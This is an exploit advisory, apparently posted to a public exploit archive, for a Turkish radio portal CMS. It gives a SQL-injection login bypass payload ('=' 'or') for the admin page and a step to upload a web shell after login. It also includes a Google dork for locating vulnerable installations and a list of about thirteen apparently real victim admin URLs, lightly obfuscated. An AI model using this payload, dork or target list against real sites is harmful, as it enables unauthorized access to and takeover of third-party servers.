######################
# Exploit Title : Turkish Radyo Portal Authentication Bypass / Shell Upload
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://www.radyositesikur.com/
# Google Dork : Radyo inurl:haberoku.php?id=
# Date: 2015/12/01
# Version : V1 & V2
#
######################
# PoC:
# target/admin
# To bypass the login page enter '=' 'or' for username and password input.
# Login And Upload Shell D:
# Youtube Demo : https://www.youtube.com/watch?v=0tvAu_g47Zc
#
#Demo:
#
#http://dorukfm.frXeevar.com/admin/yonetim.php
#http://www.eceXmfm.com/admin/yonetim.php
#http://ogrencirXadyosu.net.tr/admin/yonetim.php
#http://www.sXuperturkfm.com/admin/yonetim.php
#http://wwwX.e.sesli-dj.com/radyo/admin/yonetim.php
#http://wwXw.sohbetalafm.com/admin/yonetim.php
#http://bXtm72.96.lt/admin/yonetim.php
#http://dorukfm.freeXvar.com/admin/yonetim.php
#http://radyoacapeXlla.16mb.com/radyo/admin/yonetim.php
#http://radyo.selcXuklu2.com/admin/yonetim.php
#http://www.kralXfmradyo.net/admin/yonetim.php
#http://www.anXtalyaradyo07.com/admin/yonetim.php
#http://www.gXevezefm.org/index.php
#
#
######################
# Discovered by :
# Mojtaba MobhaM (kazemimojtaba@live.com)
# T3NZOG4N (t3nz0g4n@yahoo.com)
######################